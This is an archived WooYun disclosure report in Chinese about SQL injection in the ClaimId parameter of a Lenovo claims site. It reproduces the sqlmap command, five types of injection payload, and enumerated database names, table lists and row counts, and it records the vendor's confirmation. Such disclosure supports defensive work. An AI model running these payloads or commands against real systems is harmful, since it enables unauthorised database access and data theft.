乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-01-03: 细节已通知厂商并且等待厂商处理中 2014-01-03: 厂商已经确认,细节仅向厂商公开 2014-01-13: 细节向核心白帽子及相关领域专家公开 2014-01-23: 细节向普通白帽子公开 2014-02-02: 细节向实习白帽子公开 2014-02-17: 细节向公众公开
联想#某重要服务平台系统存在SQL注射导致信息泄露(多库)
站点;http://claims.lenovo.com 联想服务平台系统由于网站没有设置robots.txt,导致被搜索引擎抓取
ClaimId参数没有过滤,导致注射sqlmap跑起来
Sqlmap -u "http://claims.lenovo.com/Claim/PrintPartInformation.aspx?ClaimId=9990540964&PartNumber=45N7321&Notes" --dbs --current-user --current-dbPlace: GETParameter: ClaimId Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ClaimId=9990540964' AND 2958=2958 AND 'Pjcy'='Pjcy&PartNumber=45N7321&Notes Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: ClaimId=9990540964' AND 9468=CONVERT(INT,(CHAR(58)+CHAR(115)+CHAR(101)+CHAR(118)+CHAR(58)+(SELECT (CASE WHEN (9468=9468) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(118)+CHAR(102)+CHAR(98)+CHAR(58))) AND 'whgb'='whgb&PartNumber=45N7321&Notes Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: ClaimId=-4899' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(115)+CHAR(101)+CHAR(118)+CHAR(58)+CHAR(73)+CHAR(99)+CHAR(122)+CHAR(66)+CHAR(115)+CHAR(80)+CHAR(88)+CHAR(109)+CHAR(111)+CHAR(89)+CHAR(58)+CHAR(118)+CHAR(102)+CHAR(98)+CHAR(58), NULL, NULL, NULL, NULL, NULL, NULL-- &PartNumber=45N7321&Notes Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: ClaimId=9990540964'; WAITFOR DELAY '0:0:5';--&PartNumber=45N7321&Notes Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: ClaimId=9990540964' WAITFOR DELAY '0:0:5'--&PartNumber=45N7321&Notes---[17:34:45] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2005[17:34:45] [INFO] fetching current usercurrent user: 'eclaim'[17:34:45] [INFO] fetching current databasecurrent database: 'Eclaim_p'[17:34:45] [INFO] fetching database names[17:34:45] [INFO] the SQL query used returns 6 entries[17:34:45] [INFO] resumed: "Eclaim"[17:34:45] [INFO] resumed: "Eclaim_p"[17:34:45] [INFO] resumed: "master"[17:34:45] [INFO] resumed: "model"[17:34:45] [INFO] resumed: "msdb"[17:34:45] [INFO] resumed: "tempdb"available databases [6]:[*] Eclaim[*] Eclaim_p[*] master[*] model[*] msdb[*] tempdb
当前库
Database: Eclaim_p[191 tables]+---------------------------------------------+| dbo.BP_Customer || dbo.BP_Customer_Deleted || dbo.BP_Customer_Repeated || dbo.BP_Key_Customer || dbo.BP_Loc_Customer_Relation || dbo.BP_Material_Vendor || dbo.BP_Mentorware_Oper_Log || dbo.BP_Org_AUSP || dbo.BP_Org_Technician || dbo.BP_Org_ZSDI || dbo.BP_Organization || dbo.BP_OrganizationProdLine || dbo.BP_Product || dbo.BP_RemitAddress || dbo.BP_ShipAddress || dbo.BP_Technician || dbo.BP_Technician_Certification || dbo.BP_Technician_Ext || dbo.BP_Technician_RelayWare || dbo.BP_Technician_RelayWare_Error || dbo.BP_Technician_RelayWare_Log || dbo.BP_Technician_RelayWare_Temp || dbo.BP_Technician_Training || dbo.BP_Technician_Training_BAK_20130522 || dbo.BP_VRU_EXTRACT || dbo.BP_Warranty || dbo.BP_Warranty_Deteled || dbo.BP_Warranty_SunTemp || dbo.BP_Warranty_SunTempError || dbo.CL_Claim || dbo.CL_ClaimDetail || dbo.CL_ClaimDetail20130309bak || dbo.CL_ClaimDetail_2011bak || dbo.CL_ClaimDetail_20130705_bak || dbo.CL_ClaimDetail_20130707bak || dbo.CL_ClaimDetail_Deleted || dbo.CL_ClaimDetail_Repeated || dbo.CL_ClaimFeedback || dbo.CL_ClaimFeedback20130309bak || dbo.CL_ClaimFeedback_2011bak || dbo.CL_ClaimPayment || dbo.CL_ClaimPayment_Deleted || dbo.CL_Claim_Deleted || dbo.CL_Claim_Repeated || dbo.CL_Condtemp || dbo.CL_PayCond || dbo.CL_PayCond20130306 || dbo.CL_PayCond_Temp || dbo.CL_PayPricing || dbo.DI_BP_Customer || dbo.DI_BP_Customer_Temp || dbo.DI_BP_Warranty || dbo.DI_BP_Warranty_Temp || dbo.DI_CL_Claim || dbo.DI_CL_ClaimDetail || dbo.DI_CL_ClaimDetail_Temp || dbo.DI_CL_ClaimFeedback || dbo.DI_CL_ClaimFeedback_Temp || dbo.DI_CL_ClaimPayment || dbo.DI_CL_ClaimPayment_Temp || dbo.DI_CL_Claim_Temp || dbo.DI_CRU_TIER_ORGDATA || dbo.DI_CRU_TIER_TEMP || dbo.DI_ECA || dbo.DI_EClaimSYNC_FtpFileList || dbo.DI_FRU_SUB || dbo.DI_FromSatmetrix || dbo.DI_FromSatmetrix_Temp || dbo.DI_MARA || dbo.DI_MTFRU_ORGDATA || dbo.DI_MT_FRU || dbo.DI_MT_FRU_BAK_20130513 || dbo.DI_MT_FRU_CRMINI || dbo.DI_MT_FRU_SingleTemp || dbo.DI_MT_FRU_SingleTemp_BAK20130529 || dbo.DI_MaterialGroup || dbo.DI_MaterialGroup_temp || dbo.DI_Material_Info || dbo.DI_PART_WTY || dbo.DI_PPN_FRU || dbo.DI_PPN_FRU_SingleTemp || dbo.DI_SCRE_INI || dbo.DI_ToStatmetrix || dbo.DI_ToStatmetrix_temp || dbo.DI_TrainingCourse || dbo.DI_UPR || dbo.DI_UPR_CPPS || dbo.DI_UPR_ORGDATA || dbo.DI_UPR_PIMS || dbo.DI_UPR_WSTN || dbo.DI_VRU_EXTRACT || dbo.DI_VRU_EXTRACT_temp || dbo.DI_VRU_FILELOG || dbo.ErrorLog || dbo.FTP_Service_ErrorLog || dbo.FTP_Service_ExcuteLog || dbo.HTK_Report_DataFromMTM || dbo.HTK_Report_DataFromMTM_TEMP || dbo.HTK_Report_DataFromMTMbak || dbo.INI_MARA_PRODH || dbo.INI_maktx || dbo.Internaluser_cuisy || dbo.LOG_DTS_IBASE || dbo.L_UserID_Role || dbo.L_UserID_Role_NULL || dbo.LogTable || dbo.MTFRU_SINGLE20110506 || dbo.MTFRU_SINGLE20110507 || dbo.MTFRU_SINGLE20110508 || dbo.MTFRU_SINGLE20110510 || dbo.SCORECARD_REPORT || dbo.SDF || dbo.SERVICE_CODE || dbo.SERVICE_CODE_BAK_20131126 || dbo.SERVICE_MACHINE_SDF || dbo.SERVICE_SDF || dbo.SERVICE_SDF_BAK_20131126 || dbo.SERVICE_SPLIT_SDF || dbo.SY_Action || dbo.SY_Certification || dbo.SY_CondType || dbo.SY_Course || dbo.SY_Enterprise || dbo.SY_InternalRole || dbo.SY_InternalRole_MEMBER || dbo.SY_InternalRole_PageBtn || dbo.SY_LOGIN_Failure_LOG || dbo.SY_LOGIN_LOG || dbo.SY_MarktingAttribut || dbo.SY_PARAMS || dbo.SY_PRIVILEGE || dbo.SY_PRIVILEGE_backup || dbo.SY_PRIVILEGE_phase1 || dbo.SY_PageBtn || dbo.SY_Privile_User || dbo.SY_Privile_User_BAK_2013051 || dbo.SY_ProdLine || dbo.SY_ROLE || dbo.SY_ROLE_MEMBER || dbo.SY_ROLE_MEMBER_bak || dbo.SY_ROLE_PRIVILEGE || dbo.SY_ROLE_PRIVILEGE_1a || dbo.SY_ROLE_PRIVILEGE_phase1 || dbo.SY_SEQ || dbo.SY_SERVICES_RELATION || dbo.SY_State || dbo.SY_User_LoginError_Count || dbo.SY_User_Org || dbo.SY_User_PasswordReset_Log || dbo.SY_VALUE || dbo.SY_VALUE_bak_20130424 || dbo.SY_Vendor || dbo.SY_Vendor_Payment || dbo.SY_Vendor_Prodline || dbo.SY_Vendor_Prodline_test || dbo.SY_role_PRIVILEGE_backup || dbo.SY_role_PRIVILEGE_bak || dbo.TS_I_002_A_B || dbo.TS_I_002_A_B_TEMP || dbo.Think_Machine_Sequence || dbo.UPR_0321 || dbo.User_Role$_yy || dbo.VW_Account || dbo.VW_SERVICE_MACHINE_SDF || dbo.[SSIS Configurations] || dbo.bp_qual_condi || dbo.di_mt_fru_temp || dbo.di_ppn_fru_crmini || dbo.di_ppn_fru_temp || dbo.di_ppn_fru_upload || dbo.di_trainingcourse_temp || dbo.di_upr_random || dbo.duplicate_claims || dbo.internal_user || dbo.internal_user_name || dbo.internaluser_bp || dbo.lidane_monitor || dbo.monitor_0329 || dbo.mt_fru_update || dbo.sy_modify_log || dbo.sy_privilege_forphase2 || dbo.sy_value_bak || dbo.sysdiagrams || dbo.think_packing_machine_material_20060101 || dbo.think_packing_machine_material_20070101 || dbo.think_packing_machine_material_20080101 || dbo.think_packing_machine_material_20090101 || dbo.think_packing_machine_material_20100101 || dbo.think_packing_machine_material_20110101 || dbo.vw_think_packing_machine_material || dbo.yy_US_UPR_INI |+---------------------------------------------+另外1个库Database: Eclaim[293 tables]+---------------------------------------------+| dbo.BP_Customer || dbo.BP_Material_Vendor || dbo.BP_Org_AUSP || dbo.BP_Org_AUSP_SunBak || dbo.BP_Org_Technician || dbo.BP_Organization || dbo.BP_OrganizationProdLine || dbo.BP_Product || dbo.BP_RemitAddress || dbo.BP_ShipAddress || dbo.BP_Technician || dbo.BP_Technician_Certification || dbo.BP_Technician_Ext || dbo.BP_Technician_Training || dbo.BP_VRU_EXTRACT || dbo.BP_Warranty || dbo.CL_Claim || dbo.CL_ClaimDetail || dbo.CL_ClaimFeedback || dbo.CL_ClaimFeedback_20110322 || dbo.CL_ClaimFeedback_bak0327 || dbo.CL_ClaimPayment || dbo.CL_PayCond || dbo.CL_PayPricing || dbo.CUISY_VALUE || dbo.DI_ECA || dbo.DI_FRU_SUB || dbo.DI_FromSatmetrix || dbo.DI_FromSatmetrix_Temp || dbo.DI_MARA || dbo.DI_MT_FRU || dbo.DI_MT_FRU_CRMINI || dbo.DI_Material_Info || dbo.DI_PART_WTY || dbo.DI_PPN_FRU || dbo.DI_SCRE_INI || dbo.DI_ToStatmetrix || dbo.DI_ToStatmetrix_temp || dbo.DI_TrainingCourse || dbo.FTP_Service_ErrorLog || dbo.FTP_Service_ExcuteLog || dbo.HTK_Report_DataFromMTM || dbo.HTK_Report_DataFromMTM_TEMP || dbo.HTK_Report_DataFromMTMbak || dbo.LOG_DTS_IBASE || dbo.PMAMAP || dbo.PMARTF || dbo.PMATTR || dbo.PMBMAP || dbo.PMBPMDAAC || dbo.PMBPMDATA || dbo.PMBPMDCSN || dbo.PMBPMDTRS || dbo.PMBPMENDS || dbo.PMBPMEVNT || dbo.PMBPMFLOW || dbo.PMBPMFRMT || dbo.PMBPMMSPT || dbo.PMBPMOPER || dbo.PMBPMPROC || dbo.PMBPMPRVD || dbo.PMBPMRFLW || dbo.PMBPMRSRC || dbo.PMBPMS || dbo.PMBPMSYNC || dbo.PMBPMVARB || dbo.PMBRNC || dbo.PMCDMASSC || dbo.PMCDMDTSC || dbo.PMCDMENTT || dbo.PMCDMINHR || dbo.PMCDMLINK || dbo.PMCDMPROP || dbo.PMCDMRLSH || dbo.PMCHCK || dbo.PMCLSS || dbo.PMCMAP || dbo.PMCNFG || dbo.PMCONT || dbo.PMDBMS || dbo.PMDFLT || dbo.PMDIAG || dbo.PMDTSC || dbo.PMDVTL || dbo.PMEMDL || dbo.PMEOBJ || dbo.PMEXAS || dbo.PMFILO || dbo.PMFLDR || dbo.PMGUSR || dbo.PMILMACOL || dbo.PMILMARTC || dbo.PMILMBPRC || dbo.PMILMCCDB || dbo.PMILMDAAP || dbo.PMILMDALN || dbo.PMILMDBIN || dbo.PMILMDBOU || dbo.PMILMDCNT || dbo.PMILMDSCL || dbo.PMILMDSJN || dbo.PMILMDTBS || dbo.PMILMDTCL || dbo.PMILMDTFL || dbo.PMILMDTLU || dbo.PMILMDTQE || dbo.PMILMEVSC || dbo.PMILMFFIL || dbo.PMILMFFOU || dbo.PMILMGDOU || dbo.PMILMGLNK || dbo.PMILMPCKG || dbo.PMILMPRMT || dbo.PMILMPROC || dbo.PMILMPUBL || dbo.PMILMRPRC || dbo.PMILMSCEX || dbo.PMILMSCOL || dbo.PMILMSUBS || dbo.PMILMTPRC || dbo.PMILMTREN || dbo.PMILMXDOC || dbo.PMILMXMOU || dbo.PMLATT || dbo.PMLBIN || dbo.PMLIBR || dbo.PMLOCK || dbo.PMLRRS || dbo.PMLSRP || dbo.PMOBJT || dbo.PMOCNF || dbo.PMOLOG || dbo.PMOOMACTN || dbo.PMOOMACTV || dbo.PMOOMANOT || dbo.PMOOMASSC || dbo.PMOOMATVL || dbo.PMOOMCLNK || dbo.PMOOMCMPI || dbo.PMOOMCOMP || dbo.PMOOMCSFR || dbo.PMOOMDCSN || dbo.PMOOMDTSC || dbo.PMOOMENDS || dbo.PMOOMGNRL || dbo.PMOOMIACT || dbo.PMOOMIAPM || dbo.PMOOMIFRG || dbo.PMOOMILNK || dbo.PMOOMIREF || dbo.PMOOMMSSG || dbo.PMOOMMTHD || dbo.PMOOMOAPM || dbo.PMOOMOBJT || dbo.PMOOMOBST || dbo.PMOOMPARM || dbo.PMOOMPART || dbo.PMOOMPORT || dbo.PMOOMSTAT || dbo.PMOOMSYNC || dbo.PMOOMTPRM || dbo.PMOOMTPRV || dbo.PMOOMVARB || dbo.PMOPTS || dbo.PMPCTF || dbo.PMPDMABDT || dbo.PMPDMADPR || dbo.PMPDMCIDX || dbo.PMPDMDBPK || dbo.PMPDMDTBS || dbo.PMPDMGRPE || dbo.PMPDMINDX || dbo.PMPDMJIDX || dbo.PMPDMMEAS || dbo.PMPDMNMSP || dbo.PMPDMPARM || dbo.PMPDMPERM || dbo.PMPDMPKCU || dbo.PMPDMPKEX || dbo.PMPDMPKPR || dbo.PMPDMPKTY || dbo.PMPDMPKVA || dbo.PMPDMPRCT || dbo.PMPDMPROC || dbo.PMPDMPROF || dbo.PMPDMREFR || dbo.PMPDMROLE || dbo.PMPDMRSCL || dbo.PMPDMSQNC || dbo.PMPDMSYNM || dbo.PMPDMTABL || dbo.PMPDMTKEY || dbo.PMPDMTRGI || dbo.PMPDMTRGR || dbo.PMPDMTRGT || dbo.PMPDMUSER || dbo.PMPDMVIDX || dbo.PMPDMVIEW || dbo.PMPDMVIWC || dbo.PMPDMVREF || dbo.PMPDMWPRM || dbo.PMPDMWSOP || dbo.PMPDMWSRV || dbo.PMPERM || dbo.PMPSEL || dbo.PMPSLM || dbo.PMREPL || dbo.PMRLSH || dbo.PMRLTN || dbo.PMRLTX || dbo.PMRMAP || dbo.PMRPLG || dbo.PMRPRT || dbo.PMRQMGRPE || dbo.PMRQMRQMT || dbo.PMRQMTLNK || dbo.PMRQMUSER || dbo.PMRQMUSRA || dbo.PMRULE || dbo.PMSEQN || dbo.PMSMAP || dbo.PMSRPL || dbo.PMSTNG || dbo.PMTEMP || dbo.PMTEXT || dbo.PMTMP2 || dbo.PMTRFM || dbo.PMTRFS || dbo.PMTRFT || dbo.PMUSER || dbo.PMXDOC || dbo.PMXFIL || dbo.PMXNSP || dbo.PMXSMAITM || dbo.PMXSMANNT || dbo.PMXSMCMAP || dbo.PMXSMCMPT || dbo.PMXSMDTSC || dbo.PMXSMENTT || dbo.PMXSMLANG || dbo.PMXSMXTRN || dbo.SDF || dbo.SERVICE_CODE || dbo.SERVICE_MACHINE_SDF || dbo.SERVICE_SDF || dbo.SERVICE_SPLIT_SDF || dbo.SY_Certification || dbo.SY_CondType || dbo.SY_Course || dbo.SY_Enterprise || dbo.SY_InternalRole || dbo.SY_InternalRole_MEMBER || dbo.SY_InternalRole_PageBtn || dbo.SY_LOGIN_LOG || dbo.SY_MarktingAttribut || dbo.SY_PARAMS || dbo.SY_PRIVILEGE || dbo.SY_PageBtn || dbo.SY_Privile_User || dbo.SY_ProdLine || dbo.SY_ROLE || dbo.SY_ROLE_MEMBER || dbo.SY_ROLE_PRIVILEGE || dbo.SY_SEQ || dbo.SY_SERVICES_RELATION || dbo.SY_State || dbo.SY_User_Org || dbo.SY_VALUE || dbo.SY_Vendor || dbo.SY_Vendor_Payment || dbo.SY_Vendor_Prodline || dbo.TEMP_CUISY_2011 || dbo.TEMP_CUISY_VALUE || dbo.Think_Machine_Sequence || dbo.VW_Account || dbo.VW_SERVICE_MACHINE_SDF || dbo.ZSDI_EDI_ORD_QLF_cuisy2 || dbo.bp_qual_condi || dbo.bp_warranty_bak20110406 || dbo.cuisy_feedback0323 || dbo.di_mt_fru_temp || dbo.di_ppn_fru_crmini || dbo.di_ppn_fru_temp || dbo.di_trainingcourse_temp || dbo.sy_modify_log || dbo.sy_value_bak || dbo.think_packing_machine_material_20060101 || dbo.think_packing_machine_material_20070101 || dbo.think_packing_machine_material_20080101 || dbo.think_packing_machine_material_20090101 || dbo.think_packing_machine_material_20100101 || dbo.think_packing_machine_material_20110101 || dbo.vw_think_packing_machine_material |+---------------------------------------------+数据量也很大Database: Eclaim+---------------------------------+---------+| Table | Entries |+---------------------------------+---------+| dbo.DI_MT_FRU | 2994159 || dbo.DI_MT_FRU_CRMINI | 2990927 || dbo.DI_Material_Info | 1702212 || dbo.HTK_Report_DataFromMTM | 1687041 || dbo.HTK_Report_DataFromMTM_TEMP | 659157 || dbo.di_ppn_fru_temp | 289516 || dbo.DI_MARA | 281838 || dbo.CL_ClaimFeedback_bak0327 | 229296 || dbo.BP_Technician_Ext | 135492 || dbo.DI_PPN_FRU | 128172 || dbo.di_ppn_fru_crmini | 127756 || dbo.BP_Customer | 94962 || dbo.BP_Org_Technician | 63109 || dbo.DI_SCRE_INI | 61180 || dbo.HTK_Report_DataFromMTMbak | 50000 || dbo.BP_Org_AUSP_SunBak | 38112 || dbo.BP_Org_AUSP | 37758 || dbo.BP_Technician_Training | 27263 || dbo.BP_Technician | 19400 || dbo.SY_ROLE_MEMBER | 14085 || dbo.DI_FromSatmetrix_Temp | 11430 || dbo.DI_FromSatmetrix | 11390 || dbo.BP_OrganizationProdLine | 9564 || dbo.SY_LOGIN_LOG | 9351 || dbo.sy_modify_log | 7001 || dbo.cuisy_feedback0323 | 6853 || dbo.ZSDI_EDI_ORD_QLF_cuisy2 | 6621 || dbo.DI_FRU_SUB | 5660 || dbo.CL_ClaimDetail | 4876 || dbo.SY_User_Org | 4483 || dbo.BP_Technician_Certification | 4109 || dbo.PMRLTX | 3352 || dbo.SY_Privile_User | 3151 || dbo.VW_Account | 3151 || dbo.FTP_Service_ErrorLog | 2672 || dbo.BP_Warranty | 2066 || dbo.bp_warranty_bak20110406 | 2066 || dbo.CL_Claim | 1956 || dbo.SDF | 1914 || dbo.PMATTR | 1867 || dbo.CL_ClaimFeedback | 1820 || dbo.CL_ClaimFeedback_20110322 | 1820 || dbo.SERVICE_SDF | 1584 || dbo.BP_Organization | 1500 || dbo.CL_PayPricing | 1435 || dbo.FTP_Service_ExcuteLog | 1057 || dbo.PMRLTN | 798 || dbo.DI_ToStatmetrix | 658 || dbo.DI_ECA | 507 || dbo.BP_ShipAddress | 472 || dbo.PMCLSS | 464 || dbo.CL_ClaimPayment | 463 || dbo.di_trainingcourse_temp | 428 || dbo.BP_Product | 381 || dbo.SY_VALUE | 208 || dbo.sy_value_bak | 206 || dbo.BP_RemitAddress | 191 || dbo.di_mt_fru_temp | 189 || dbo.TEMP_CUISY_2011 | 155 || dbo.DI_ToStatmetrix_temp | 152 || dbo.CUISY_VALUE | 148 || dbo.TEMP_CUISY_VALUE | 148 || dbo.SERVICE_CODE | 111 || dbo.SY_ROLE_PRIVILEGE | 70 || dbo.DI_PART_WTY | 67 || dbo.SY_State | 60 || dbo.DI_TrainingCourse | 41 || dbo.SERVICE_MACHINE_SDF | 40 || dbo.VW_SERVICE_MACHINE_SDF | 40 || dbo.SY_PRIVILEGE | 37 || dbo.SY_MarktingAttribut | 23 || dbo.SY_ProdLine | 21 || dbo.bp_qual_condi | 16 || dbo.PMLIBR | 16 || dbo.SY_CondType | 15 || dbo.SY_SERVICES_RELATION | 14 || dbo.SY_Vendor_Prodline | 11 || dbo.SY_Course | 10 || dbo.PMSEQN | 7 || dbo.SY_SEQ | 6 || dbo.BP_VRU_EXTRACT | 5 || dbo.SY_ROLE | 5 || dbo.LOG_DTS_IBASE | 4 || dbo.BP_Material_Vendor | 3 || dbo.PMUSER | 3 || dbo.SY_Certification | 3 || dbo.SY_Vendor_Payment | 3 || dbo.SERVICE_SPLIT_SDF | 2 || dbo.SY_PageBtn | 2 || dbo.PMBRNC | 1 || dbo.PMGUSR | 1 || dbo.PMOBJT | 1 || dbo.PMPERM | 1 || dbo.SY_InternalRole | 1 || dbo.SY_InternalRole_MEMBER | 1 || dbo.SY_InternalRole_PageBtn | 1 || dbo.SY_PARAMS | 1 |+---------------------------------+---------+
over
已经证明
1、过滤参数2、高RANK3、SSD快到碗里来
危害等级:高
漏洞Rank:15
确认时间:2014-01-03 17:12
感谢您对联想安全做出的贡献!我们将立即评估与修复相关漏洞
暂无
